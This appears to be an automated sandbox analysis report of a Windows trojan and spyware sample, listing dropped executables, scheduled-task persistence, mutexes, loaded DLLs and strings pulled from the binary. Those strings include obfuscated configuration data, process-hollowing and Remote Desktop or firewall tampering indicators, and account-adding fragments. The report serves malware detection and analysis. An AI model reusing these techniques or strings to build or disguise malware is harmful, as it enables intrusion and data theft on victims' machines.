                          Source: Fp80Ocyhqm.exe, Gxtuum.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
                          Source: Fp80Ocyhqm.exe, Gxtuum.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA2562021CA1.crl0S
                          Source: Gxtuum.exe, 00000001.00000002.3779688440.00000000008E9000.00000004.00000020.00020000.00000000.sdmp, cubrodriver.exe, 00000005.00000002.1446823242.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, fvvb.exe.5.dr, cubrodriver[1].exe.1.dr, cubrodriver.exe.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                          Source: Fp80Ocyhqm.exe, Gxtuum.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                          Source: Gxtuum.exe.0.dr, fvvb.exe.5.dr, cubrodriver[1].exe.1.dr, cubrodriver.exe.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                          Source: Fp80Ocyhqm.exe, Gxtuum.exe.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA2562021CA1.crl0
                          Source: Gxtuum.exe, 00000001.00000002.3779688440.00000000008E9000.00000004.00000020.00020000.00000000.sdmp, cubrodriver.exe, 00000005.00000002.1446823242.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, fvvb.exe.5.dr, cubrodriver[1].exe.1.dr, cubrodriver.exe.1.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                          Source: Gxtuum.exe, 00000001.00000002.3779688440.00000000008E9000.00000004.00000020.00020000.00000000.sdmp, cubrodriver.exe, 00000005.00000002.1446823242.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, fvvb.exe.5.dr, cubrodriver[1].exe.1.dr, cubrodriver.exe.1.drString found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#
                          Source: Gxtuum.exe, 00000001.00000002.3779688440.00000000008E9000.00000004.00000020.00020000.00000000.sdmp, cubrodriver.exe, 00000005.00000002.1446823242.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, fvvb.exe.5.dr, cubrodriver[1].exe.1.dr, cubrodriver.exe.1.drString found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#
                          Source: Fp80Ocyhqm.exe, Gxtuum.exe.0.dr, fvvb.exe.5.dr, cubrodriver[1].exe.1.dr, cubrodriver.exe.1.drString found in binary or memory: http://ocsp.digicert.com0
                          Source: Fp80Ocyhqm.exe, Gxtuum.exe.0.dr, fvvb.exe.5.dr, cubrodriver[1].exe.1.dr, cubrodriver.exe.1.drString found in binary or memory: http://ocsp.digicert.com0A
                          Source: Fp80Ocyhqm.exe, Gxtuum.exe.0.drString found in binary or memory: http://ocsp.digicert.com0C
                          Source: Fp80Ocyhqm.exe, Gxtuum.exe.0.drString found in binary or memory: http://ocsp.digicert.com0I
                          Source: Fp80Ocyhqm.exe, Gxtuum.exe.0.drString found in binary or memory: http://ocsp.digicert.com0X
                          Source: Gxtuum.exe, 00000001.00000002.3779688440.00000000008E9000.00000004.00000020.00020000.00000000.sdmp, cubrodriver.exe, 00000005.00000002.1446823242.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, fvvb.exe.5.dr, cubrodriver[1].exe.1.dr, cubrodriver.exe.1.drString found in binary or memory: http://ocsp.sectigo.com0
                          Source: Fp80Ocyhqm.exe, Gxtuum.exe.0.dr, fvvb.exe.5.dr, cubrodriver[1].exe.1.dr, cubrodriver.exe.1.drString found in binary or memory: http://www.digicert.com/CPS0
                          Source: Gxtuum.exe, 00000001.00000002.3779688440.00000000008E9000.00000004.00000020.00020000.00000000.sdmp, cubrodriver.exe, 00000005.00000002.1446823242.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, fvvb.exe.5.dr, cubrodriver[1].exe.1.dr, cubrodriver.exe.1.drString found in binary or memory: https://sectigo.com/CPS0
                          Source: C:\Users\user\Desktop\Fp80Ocyhqm.exeCode function: 0_2_000661F0 RegOpenKeyExA,RegQueryValueExA,RegCloseKey,RegOpenKeyExA,RegSetValueExA,RegCloseKey,RegOpenKeyExA,RegSetValueExA,RegCloseKey,RegOpenKeyExA,RegQueryInfoKeyW,RegEnumValueA,RegCloseKey,GdiplusStartup,GetDC,RegGetValueA,RegGetValueA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,RegGetValueA,GetSystemMetrics,GetSystemMetrics,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GdipCreateBitmapFromHBITMAP,GdipGetImageEncodersSize,GdipGetImageEncoders,GdipSaveImageToFile,SelectObject,DeleteObject,DeleteObject,DeleteObject,ReleaseDC,GdipDisposeImage,GdiplusShutdown,GetUserNameA,LookupAccountNameA,GetSidIdentifierAuthority,GetSidSubAuthorityCount,GetSidSubAuthority,GetSidSubAuthority,0_2_000661F0

                          System Summary

                          barindex
                          Source: cubrodriver[1].exe.1.drStatic PE information: section name:
                          Source: cubrodriver[1].exe.1.drStatic PE information: section name: .idata
                          Source: cubrodriver[1].exe.1.drStatic PE information: section name:
                          Source: cubrodriver.exe.1.drStatic PE information: section name:
                          Source: cubrodriver.exe.1.drStatic PE information: section name: .idata
                          Source: cubrodriver.exe.1.drStatic PE information: section name:
                          Source: fvvb.exe.5.drStatic PE information: section name:
                          Source: fvvb.exe.5.drStatic PE information: section name: .idata
                          Source: fvvb.exe.5.drStatic PE information: section name:
                          Source: C:\ProgramData\giab\fvvb.exeProcess Stats: CPU usage > 49%
                          Source: C:\Users\user\Desktop\Fp80Ocyhqm.exeFile created: C:\Windows\Tasks\Gxtuum.job
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeFile created: C:\Windows\Tasks\Test Task17.job
                          Source: C:\Users\user\Desktop\Fp80Ocyhqm.exeCode function: 0_2_000661F00_2_000661F0
                          Source: C:\Users\user\Desktop\Fp80Ocyhqm.exeCode function: 0_2_000A40E70_2_000A40E7
                          Source: C:\Users\user\Desktop\Fp80Ocyhqm.exeCode function: 0_2_0009C77D0_2_0009C77D
                          Source: C:\Users\user\Desktop\Fp80Ocyhqm.exeCode function: 0_2_00092CC00_2_00092CC0
                          Source: C:\Users\user\Desktop\Fp80Ocyhqm.exeCode function: 0_2_00064EF00_2_00064EF0
                          Source: C:\Users\user\Desktop\Fp80Ocyhqm.exeCode function: 0_2_0009CF090_2_0009CF09
                          Source: C:\Users\user\Desktop\Fp80Ocyhqm.exeCode function: 0_2_000651A00_2_000651A0
                          Source: C:\Users\user\Desktop\Fp80Ocyhqm.exeCode function: 0_2_000654500_2_00065450
                          Source: C:\Users\user\Desktop\Fp80Ocyhqm.exeCode function: 0_2_0008B5600_2_0008B560
                          Source: C:\Users\user\Desktop\Fp80Ocyhqm.exeCode function: 0_2_0008F77B0_2_0008F77B
                          Source: C:\Users\user\Desktop\Fp80Ocyhqm.exeCode function: 0_2_000A19770_2_000A1977
                          Source: C:\Users\user\Desktop\Fp80Ocyhqm.exeCode function: 0_2_000A5D740_2_000A5D74
                          Source: C:\Users\user\Desktop\Fp80Ocyhqm.exeCode function: 0_2_000A5E940_2_000A5E94
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exeCode function: 1_2_004161F01_2_004161F0
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exeCode function: 1_2_0041B7001_2_0041B700
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exeCode function: 1_2_004540E71_2_004540E7
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exeCode function: 1_2_00442CC01_2_00442CC0
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exeCode function: 1_2_00414EF01_2_00414EF0
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exeCode function: 1_2_0044CF091_2_0044CF09
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exeCode function: 1_2_004151A01_2_004151A0
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exeCode function: 1_2_004154501_2_00415450
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exeCode function: 1_2_0043B5601_2_0043B560
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe Code function: 1_2_0043F77B
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe Code function: 1_2_00455D74
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe Code function: 1_2_00455E94
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe Code function: 3_2_004540E7
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe Code function: 3_2_004161F0
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe Code function: 3_2_0044C77D
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe Code function: 3_2_00442CC0
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe Code function: 3_2_00414EF0
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe Code function: 3_2_0044CF09
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe Code function: 3_2_004151A0
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe Code function: 3_2_00415450
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe Code function: 3_2_0043B560
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe Code function: 3_2_0043F77B
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe Code function: 3_2_00451977
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe Code function: 3_2_00455D74
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe Code function: 3_2_00455E94
                          Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe B1663D4497DDD27A59F090B72ADCEDDDAC51724A1C126F7D6469F8045D065E15
                          Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe Code function: String function: 00083FF0 appears 136 times
                          Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe Code function: String function: 0008A610 appears 56 times
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe Code function: String function: 004484EC appears 34 times
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe Code function: String function: 004161F0 appears 37 times
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe Code function: String function: 00433FF0 appears 272 times
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe Code function: String function: 004330E0 appears 62 times
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe Code function: String function: 004424D8 appears 52 times
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe Code function: String function: 00439DC3 appears 76 times
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe Code function: String function: 0043A610 appears 112 times
                          Source: Fp80Ocyhqm.exe Static PE information: invalid certificate
                          Source: Fp80Ocyhqm.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                          Source: cubrodriver[1].exe.1.dr Static PE information: Section: yuxfscdw ZLIB complexity 0.9944930111069277
                          Source: cubrodriver.exe.1.dr Static PE information: Section: yuxfscdw ZLIB complexity 0.9944930111069277
                          Source: fvvb.exe.5.dr Static PE information: Section: yuxfscdw ZLIB complexity 0.9944930111069277
                          Source: cubrodriver.exe.1.dr Static PE information: Entrypoint disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
                          Source: fvvb.exe.5.dr Static PE information: Entrypoint disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
                          Source: cubrodriver[1].exe.1.dr Static PE information: Entrypoint disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
                          Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@12/7@2/3
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe Code function: 1_2_0041E8D0 GetUserNameA,CoInitialize,CoCreateInstance,CoUninitialize,CoUninitialize,CoUninitialize,CoUninitialize
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe File created: C:\Users\user\AppData\Roaming\10000840100\
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe Mutant created: \Sessions\1\BaseNamedObjects\bf11e9eb444cca0553e5dc41fdf05974
                          Source: C:\ProgramData\giab\fvvb.exe Mutant created: \Sessions\1\BaseNamedObjects\Test Task17
                          Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe File created: C:\Users\user\AppData\Local\Temp\a58456755d
                          Source: Fp80Ocyhqm.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe File read: C:\Users\desktop.ini
                          Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                          Source: Fp80Ocyhqm.exe Virustotal: Detection: 79%
                          Source: Fp80Ocyhqm.exe ReversingLabs: Detection: 81%
                          Source: Fp80Ocyhqm.exe String found in binary or memory: " /add /y
                          Source: Fp80Ocyhqm.exe String found in binary or memory: " /add
                          Source: Gxtuum.exe String found in binary or memory: " /add
                          Source: Gxtuum.exe String found in binary or memory: " /add /y
                          Source: Gxtuum.exe String found in binary or memory: " /add
                          Source: Gxtuum.exe String found in binary or memory: " /add /y
                          Source: cubrodriver.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                          Source: fvvb.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                          Source: Fp80Ocyhqm.exe String found in binary or memory: " /add /y
                          Source: Fp80Ocyhqm.exe String found in binary or memory: " /add
                          Source: Fp80Ocyhqm.exeString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set00fadbeacf092dfd58b48ef4ac68f826bf11e9eb444cca0553e5dc41fdf05974a4d2cd276e9105dd9f50a97adeca06ba6b6af3NRdie3By02Gn35 46TWlV1irdIQ03UAo2n je34=AoSv2n8zcrNxQWOv5jto80 dZZbrhD9rUj/v7/Ht9j e2pCqTT6fW0yjbIUrikIi2v0nd4hyNs736j==CH9yPR==Jn5leIYtyH6sgR==AH0sgR==NIZ4QEY2PEJZQD==GSm0gYZtNrK2QT==JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6UpQrYZWeOF==JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6RZctgD0tOMOcYYRlenqR2J0v6zCz96CdZZEwJSWhfoV1eF==Jb0tNR6kLDcDKKyLIHqVCz sI7J JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6UpQr2c0u2HBsOExeJwOv24Nhd2B=JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6RZctgD0tOMOcX3lldLleIpdvTDWr A==yK0TUWNQWpYEJXCIDN==MtKwfB==JtdTYB==GP0U0LV63cR62RV61SR6Nbp6NMN62vR63L96Ov56NM361w361Rh6295=NSOl2D9kdLm6P5Cs7z6d9KC1NSOl2D9kdLl=NRCpfD9kdLl=OsJ=OIJ=OIN=OIR=ILKpeh==0wW0fEsvNB==0wW0fIQ6NDX=OMmlOvCsNR6k2wRx1MSp4bqwASK1dXZ0EvR+EvV+AQGsgXhpdsBtznxrxl==5p==yc0udYU9EF==2RmleHAzOnUi3JB=0R0yenZsOExsQJCvGR00WnJ0c2OjL6qC8DWmP0 fby==JwOv24NhdZGf5JKfFK4BX2UgW7Yk5Kik7jV=FM4pfnI=HRKzfHZye7i3zHCkSd==GKSFYB==JvKu2HIgW7Kh50Os8El=GvdjgHcyKK3jPj==FK4HBo3wYHc001mRQZS47jmTbU==Fbq02HZm11UiQ0N=IbdygHcuJRdwdHczFRdte3VvKRquUHZm11UiQ0N=BsJyPAU1Po22FT==2bN=3RN=FRdugHZufHQS60GoIfCma0CTaZwehkHqObdyeT5k02GfFBGl60WnWKKreVVqQPRoAH5tOT4tsFuDe39011UYCXWs70Co 6qTaY4rTfsh1SOtOXVhfLt5zJ k6TV2FqWadIzfTvsh0LClenJt1YPgx65KT3cufLKs5F6X9UCeLmGacJwpfTEc3vqvejcv08Gj5F6C8EKeV05GCiVHsFttOT4tNXP=AH5NFh==ESSjfk4xAbuw2x==FRdugHZufHQS60GoIfCa LGlaYIeiDcq18d4OYh3fDQk36OwFUWr9K0nY44h4TH=JQqTYFZNZJCZ4qOo6kSw96 
Tco4pZZMVMtSveoVyd7maH5dw7EWTW1OHYYWi2BEq1MG1gHZyVrurQT==FRdtfIZ012yMPZ6oNLOj2HZm177n2pyv6T6o LKrc5MYik5Z4MtwPUMzPIJ0ECl8FS9=AM0udXRv1LJrJQqTYFZNZJCZ4qOo6kSw96 Tco4pZZMVMtSveoVyd7maMZ s8DWdSqqdZY4 VX0JKuOPWGBWUZGDK4B=JQqTYFZNZJCt3qWB6ZyMW1VpMFA ZZMt3bqj2YRcSrux2ZSH5UOp9KKYXHUm4DMqKbqk2XcJTF==MsFwPEE=Gv0m1YZsfKCj5KWs6jesIpmLZZIsgEMV0LduGv0m1YZsfKCj5KWs6jesIpqLZZIsgEMV0LduJPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SRgWmVcS8Kw4p0x8C0e rSib4Z=JwOv2IZjfJUf3ZZ=B9FxRR==B9FyPh==B9FxQh==B9FyQR==FS0yfnZufJyZ2ZCnMp==D9t62c0u2HBsOExsQ0moARxgxcWhf3xrc1mqzFdpCz i9WFbx8FmMjF0c1Qj3603CAF Gm3 ZIQpNx==y83gUYlpfHx=x8FmMjFy11Texr3mLB==Jvd32YNzcLKq3F o9DV=AL042XR1fLat3qGy6DmcbWGrZYWsiDMu0Liu2XUgNZOn3JZjCd==x6==2Rm1gHVvf7TeC0RjFUR JE==2SV9fx==2bKu2HctHR051ncherFeKJK860WTUJGrZYss3TH=BsFwPEE0OY =BsFwPEE0Oox=BsFwPEE0OoB=BsFwPEE0O7N=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall
                          Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe File read: C:\Users\user\Desktop\Fp80Ocyhqm.exe
                          Source: unknown Process created: C:\Users\user\Desktop\Fp80Ocyhqm.exe "C:\Users\user\Desktop\Fp80Ocyhqm.exe"
                          Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe Process created: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe "C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe"
                          Source: unknown Process created: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe
                          Source: unknown Process created: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe Process created: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe "C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe"
                          Source: unknown Process created: C:\ProgramData\giab\fvvb.exe C:\ProgramData\giab\fvvb.exe
                          Source: unknown Process created: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe
                          Source: unknown Process created: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe
                          Source: unknown Process created: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe
                          Source: unknown Process created: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe
                          Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe Process created: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe "C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe"
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe Process created: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe "C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe"
                          Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe Section loaded: apphelp.dll
                          Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe Section loaded: wininet.dll
                          Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe Section loaded: sspicli.dll
                          Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe Section loaded: kernel.appcore.dll
                          Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe Section loaded: uxtheme.dll
                          Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe Section loaded: mstask.dll
                          Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe Section loaded: windows.storage.dll
                          Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe Section loaded: wldp.dll
                          Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe Section loaded: mpr.dll
                          Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe Section loaded: dui70.dll
                          Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe Section loaded: duser.dll
                          Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe Section loaded: chartv.dll
                          Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe Section loaded: onecoreuapcommonproxystub.dll
                          Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe Section loaded: oleacc.dll
                          Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe Section loaded: atlthunk.dll
                          Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe Section loaded: textinputframework.dll
                          Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe Section loaded: coreuicomponents.dll
                          Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe Section loaded: coremessaging.dll
                          Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe Section loaded: ntmarta.dll
                          Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe Section loaded: wintypes.dll
                          Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe Section loaded: wintypes.dll
                          Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe Section loaded: wintypes.dll
                          Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe Section loaded: wtsapi32.dll
                          Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe Section loaded: winsta.dll
                          Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe Section loaded: textshaping.dll
                          Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe Section loaded: propsys.dll
                          Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe Section loaded: windows.staterepositoryps.dll
                          Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe Section loaded: windows.fileexplorer.common.dll
                          Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe Section loaded: iertutil.dll
                          Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe Section loaded: profapi.dll
                          Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe Section loaded: explorerframe.dll
                          Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe Section loaded: edputil.dll
                          Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe Section loaded: urlmon.dll
                          Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe Section loaded: srvcli.dll
                          Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe Section loaded: netutils.dll
                          Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe Section loaded: appresolver.dll
                          Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe Section loaded: bcp47langs.dll
                          Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe Section loaded: slc.dll
                          Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe Section loaded: userenv.dll
                          Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe Section loaded: sppc.dll
                          Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe Section loaded: onecorecommonproxystub.dll
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe Section loaded: apphelp.dll
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe Section loaded: wininet.dll
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe Section loaded: sspicli.dll
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe Section loaded: iertutil.dll
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe Section loaded: windows.storage.dll
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe Section loaded: wldp.dll
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe Section loaded: profapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe Section loaded: kernel.appcore.dll
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe Section loaded: ondemandconnroutehelper.dll
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe Section loaded: winhttp.dll
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe Section loaded: mswsock.dll
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe Section loaded: iphlpapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe Section loaded: winnsi.dll
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe Section loaded: urlmon.dll
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe Section loaded: srvcli.dll
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe Section loaded: netutils.dll
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe Section loaded: dnsapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe Section loaded: rasadhlp.dll
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe Section loaded: fwpuclnt.dll
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe Section loaded: uxtheme.dll
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe Section loaded: propsys.dll
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe Section loaded: edputil.dll
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe Section loaded: windows.staterepositoryps.dll
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe Section loaded: wintypes.dll
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe Section loaded: appresolver.dll
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe Section loaded: bcp47langs.dll
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe Section loaded: slc.dll
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe Section loaded: userenv.dll
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe Section loaded: sppc.dll
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe Section loaded: onecorecommonproxystub.dll
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe Section loaded: onecoreuapcommonproxystub.dll
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe Section loaded: wininet.dll
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe Section loaded: kernel.appcore.dll
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe Section loaded: wininet.dll
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe Section loaded: kernel.appcore.dll
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe Section loaded: apphelp.dll
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe Section loaded: winmm.dll
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe Section loaded: uxtheme.dll
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe Section loaded: kernel.appcore.dll
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe Section loaded: mstask.dll
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe Section loaded: mstask.dll
